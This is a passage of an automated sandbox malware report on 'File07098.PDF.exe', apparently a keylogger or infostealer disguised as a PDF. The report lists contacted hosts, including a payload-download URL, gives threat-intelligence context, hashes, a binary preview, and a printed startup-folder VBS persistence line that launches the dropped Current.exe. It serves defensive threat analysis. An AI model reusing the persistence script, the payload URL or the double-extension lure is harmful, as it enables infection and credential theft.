00000006.00000002.4483465030.000000000262B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002577000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://checkip.dyndns.orgInstallUtil.exe, 00000002.00000002.4484950182.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002534000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002521000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000262B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002577000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://erkasera.com/seuias/Mccudidikm.vdfCpHB?File07098.PDF.exe, 00000000.00000002.2078600685.00000000023D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://checkip.dyndns.comInstallUtil.exe, 00000002.00000002.4484950182.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002534000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000262B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://erkasera.com/seuias/Mccudidikm.vdfCCurrent.exe, 00000005.00000002.2265233058.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFile07098.PDF.exe, 00000000.00000002.2078600685.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002471000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://reallyfreegeoip.org/xml/File07098.PDF.exe, 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002534000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          188.132.193.46
                                          		erkasera.comTurkey
                                          		42910PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRfalse
                                          188.114.96.3
                                          		reallyfreegeoip.orgEuropean Union
                                          		13335CLOUDFLARENETUStrue
                                          193.122.130.0
                                          		checkip.dyndns.comUnited States
                                          		31898ORACLE-BMC-31898USfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1545174
                                          Start date and time:2024-10-30 07:56:41 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 9m 30s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:9
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:File07098.PDF.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                          EGA Information:
                                          • Successful, ratio: 25%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 479
                                          • Number of non-executed functions: 37
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target Current.exe, PID 528 because it is empty
                                          • Execution Graph export aborted for target File07098.PDF.exe, PID 4124 because it is empty
                                          • Execution Graph export aborted for target InstallUtil.exe, PID 2460 because it is empty
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: File07098.PDF.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          02:57:29API Interceptor33x Sleep call for process: File07098.PDF.exe modified
                                          02:57:37API Interceptor13358773x Sleep call for process: InstallUtil.exe modified
                                          02:57:48API Interceptor31x Sleep call for process: Current.exe modified
                                          07:57:39AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          188.132.193.46dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                            dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                              PO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                                Contact Form and Delivery Details.png.lnkGet hashmaliciousUnknownBrowse
                                                  Maersk Shipping Document.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    Maersk Shipping Document.com.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      188.114.96.30JLWNg4Sz1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 977255cm.nyashkoon.in/secureWindows.php
                                                      zxalphamn.docGet hashmaliciousLokibotBrowse
                                                      • touxzw.ir/alpha2/five/fre.php
                                                      QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • filetransfer.io/data-package/jI82Ms6K/download
                                                      9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
                                                      DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                      • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                      R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                      • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                      7950COPY.exeGet hashmaliciousFormBookBrowse
                                                      • www.globaltrend.xyz/b2h2/
                                                      transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • paste.ee/d/Gitmx
                                                      19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                      • www.zonguldakescortg.xyz/483l/
                                                      PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                      • www.rtpngk.xyz/876i/
                                                      193.122.130.0Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      na.docGet hashmaliciousMassLogger RATBrowse
                                                      • checkip.dyndns.org/
                                                      na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • checkip.dyndns.org/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      reallyfreegeoip.orgRequest For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.97.3
                                                      Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.97.3
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.97.3
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      z1MRforsteamDRUM-A1_pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                      • 188.114.97.3
                                                      z6INVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                      • 188.114.96.3
                                                      Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.114.97.3
                                                      INVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                      • 188.114.96.3
                                                      checkip.dyndns.comQuality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 132.226.8.169
                                                      Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 132.226.247.73
                                                      Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 158.101.44.242
                                                      Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 193.122.130.0
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 132.226.247.73
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 132.226.8.169
                                                      z1MRforsteamDRUM-A1_pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      z6INVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                      • 158.101.44.242
                                                      Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.130.0
                                                      erkasera.comdekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      PO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                                      • 188.132.193.46

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRScan_20241030.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 46.28.239.165
                                                      dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      nabm68k.elfGet hashmaliciousUnknownBrowse
                                                      • 188.132.241.224
                                                      dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      PO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                                      • 188.132.193.46
                                                      DRUMMONDLTD _ 21ST_OCTOBER_2024 _.PDFGet hashmaliciousUnknownBrowse
                                                      • 78.135.79.21
                                                      https://t.ly/k1aDEGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                      • 78.135.79.21
                                                      voicemai____Now_AUD__autoresponse(9.htmGet hashmaliciousPhisherBrowse
                                                      • 188.132.193.30
                                                      Swift E-Posta Bildirimi_2024-09-23_T11511900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 188.132.158.64
                                                      Contact Form and Delivery Details.png.lnkGet hashmaliciousUnknownBrowse
                                                      • 188.132.193.46
                                                      CLOUDFLARENETUSlf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                      • 188.114.97.3
                                                      PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                      • 188.114.96.3
                                                      Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                      • 104.21.74.191
                                                      PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                      • 188.114.97.3
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                      • 188.114.96.3
                                                      PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                      • 188.114.96.3
                                                      B6eg13TpEH.elfGet hashmaliciousUnknownBrowse
                                                      • 1.4.26.82
                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 172.64.41.3
                                                      Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.97.3
                                                      ORACLE-BMC-31898USPayment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 158.101.44.242
                                                      Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 193.122.130.0
                                                      z1MRforsteamDRUM-A1_pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      z6INVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                      • 158.101.44.242
                                                      Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.130.0
                                                      INVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                      • 193.122.6.168
                                                      Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 158.101.44.242
                                                      PAGO FRAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 158.101.44.242

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      54328bd36c14bd82ddaa0c04b25ed9adPayment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      z1MRforsteamDRUM-A1_pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      z6INVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                      • 188.114.96.3
                                                      Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      3b5074b1b5d032e5620f69f9f700ff0ePayment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      3231167_00-AG00_NL_PDF.vbsGet hashmaliciousUnknownBrowse
                                                      • 188.132.193.46
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.132.193.46
                                                      FACTURA Y ALBARANES.vbsGet hashmaliciousUnknownBrowse
                                                      • 188.132.193.46

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Roaming\Current.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\File07098.PDF.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):130048
                                                      Entropy (8bit):5.824076507922611
                                                      Encrypted:false
                                                      SSDEEP:3072:BF61vQyyaKGQlGTpIHHbOrWvmLIs3ap9LUHv7ATxBG:BFe4EKGQlo93ap9IPET
                                                      MD5:71360D65665D164B175A5A73964E96EC
                                                      SHA1:4183950B0A17B9BE22E05088EA666EBB45815A13
                                                      SHA-256:F7679E885A80F2A9CFD8424891477ED8C77B4BE6CF05BFC85D6D9DD87E095730
                                                      SHA-512:0ADDB30D47684F2952705A8B224CF31AB49FF1B4D5E48824D152E3A957E098E5D09F66C13BA42D0188EF2DBFFC5B194DBA64425C2DF64259ABACFDA4C19EEE76
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g................................. ... ....@.. .......................`............`.................................`...K.... ..`....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...`.... ......................@..@.reloc.......@......................@..B........................H........&...............................................................*...(....*..0..>.......8........E....+...8&.....}.... ....~....{....9....& ....8....*..V.#.......@(....(....*..f.s......(....:....s....z*...0..O....... ........8........E..../.......8*....{....(.... ....~....{....9....& ....8....*.&~.......*...~....*.......(....*>.........(....*>.........(....*&...(....*..&...(....*...0.......... ........8........E....n...#...U...............3...a.......<...h...z........

                                                      C:\Users\user\AppData\Roaming\Current.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\File07098.PDF.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

                                                      Download File
                                                      Process:C:\Users\user\Desktop\File07098.PDF.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):83
                                                      Entropy (8bit):4.709822571002774
                                                      Encrypted:false
                                                      SSDEEP:3:FER/n0eFHHoUkh4EaKC5+kAHn:FER/lFHI9aZ5+JH
                                                      MD5:1CD09C4AC57571430505F1B81301A1CE
                                                      SHA1:480D837BC18F41ECD7C18EB6093C3FFB62567425
                                                      SHA-256:839A031287D8023A99CB9471E921E7E1E24EFFD01549D8A7372BD5B1E09903E2
                                                      SHA-512:449E16AE187E61833CC385D3681E35DBB4B969B6892F9945ADEF16F00DF6045D134EDF5B24499B438D597B31148419B50AF6E37C2047494C6A03C465DD881D94
                                                      Malicious:true
                                                      Reputation:low
                                                      Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Current.exe"""

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):5.824076507922611
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:File07098.PDF.exe
                                                      File size:130'048 bytes
                                                      MD5:71360d65665d164b175a5a73964e96ec
                                                      SHA1:4183950b0a17b9be22e05088ea666ebb45815a13
                                                      SHA256:f7679e885a80f2a9cfd8424891477ed8c77b4be6cf05bfc85d6d9dd87e095730
                                                      SHA512:0addb30d47684f2952705a8b224cf31ab49ff1b4d5e48824d152e3a957e098e5d09f66c13ba42d0188ef2dbffc5b194dba64425c2df64259abacfda4c19eee76
                                                      SSDEEP:3072:BF61vQyyaKGQlGTpIHHbOrWvmLIs3ap9LUHv7ATxBG:BFe4EKGQlo93ap9IPET
                                                      TLSH:37D3F81BBAAB45A1C38C677FC487140417ACC296B793E74A668E23F64447FB9ED0421F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g................................. ... ....@.. .......................`............`................................

                                                      File Icon

                                                      Icon Hash:00928e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4211ae
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6720A302 [Tue Oct 29 08:55:30 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
